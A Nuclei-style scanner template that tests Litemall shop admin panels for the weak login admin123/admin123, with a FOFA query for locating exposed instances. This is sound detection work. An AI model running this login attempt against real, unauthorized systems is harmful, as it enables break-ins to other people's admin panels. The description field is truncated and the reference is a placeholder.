id: litemall-weak-passwd

info:
  name: Litemall-Login开源商城管理系统存在弱口令漏洞
  author: changge
  severity: high
  description: |
    Litemall-
  metadata:
    fofa-query: app="litemall"
  reference:
    - https://127.0.0.1
  tags: auto

http:
  - raw:
      - |
        POST /admin/auth/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Content-Type: application/json
        Accept: application/json, text/plain, */*
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9b
        Connection: close
        
        {"username":"admin123","password":"admin123","code":""}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body, '\"errmsg\"\:\"成功\"')
